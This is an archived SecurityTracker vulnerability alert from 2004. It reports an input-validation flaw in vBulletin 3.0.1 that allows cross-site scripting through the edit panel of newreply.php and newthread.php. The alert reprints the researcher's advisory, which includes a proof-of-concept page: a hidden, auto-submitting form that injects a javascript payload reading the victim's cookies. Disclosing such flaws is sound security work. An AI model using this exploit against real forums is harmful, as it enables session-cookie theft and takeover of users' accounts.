Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
vBulletin Input Validation Flaws in 'newreply.php' and 'newthread.php' Let Remote Users Conduct Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1010577
|
|
SecurityTracker URL: http://securitytracker.com/id?1010577
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 25 2004
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 3.0.1
|
Description: An input validation vulnerability was reported in vBulletin. A remote user can conduct cross-site scripting attacks.
Cheng Peng Su reported that the 'newreply.php' and 'newthread.php' scripts do not properly filter HTML code from user-supplied input
in the Edit panel. A remote user can send a specially crafted message that, when edited by a target user, will cause arbitrary
scripting code to be executed by the target user's browser. The code will originate from the site running the vBulletin software
and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including
authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the
site, or take actions on the site acting as the target user.
The vendor has reportedly been notified.
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
vBulletin software, access data recently submitted by the target user via web form to the site, or take actions on the site acting
as the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.vbulletin.com/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Cheng Peng Su <apple_soup@msn.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 24 Jun 2004 12:05:18 -0000
From: Cheng Peng Su <apple_soup@msn.com>
Subject: vBulletin HTML Injection Vuln
|
Advisory Name : vBulletin HTML Injection Vulnerability
Release Date : June 24,2004
Application : vBulletin
Test On : 3.0.1 or others?
Vendor : Jelsoft(http://www.vbulletin.com/)
Discover : Cheng Peng Su(apple_soup_at_msn.com)
Intro:
From vendor's website ,it says that ,vBulletin is a powerful, scalable and
fully customizable forums package for your web site. It has been written using
the Web's quickest-growing scripting language; PHP, and is complimented with a
highly efficient and ultra fast back-end database engine built using MySQL.
Proof of concept:
While a user is previewing the post , both newreply.php and newthread.php
do sanitize the input in 'Preview',but not Edit-panel,malicious code can be
injected thru this flaw.
Exploit:
A page as below can lead visitor to a Preview page which contains XSS code.
-------------------------Remote.html-------------------------
<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="<IMG src="javascript:alert(document.cookie)">"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>
-----------------------------End-----------------------------
Solution:
vBulletin Team will release a patch or a fixed version as soon as possible.
Contact:
Cheng Peng Su
apple_soup_at_msn.com
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China
|
|
Go to the Top of This SecurityTracker Archive Page
|
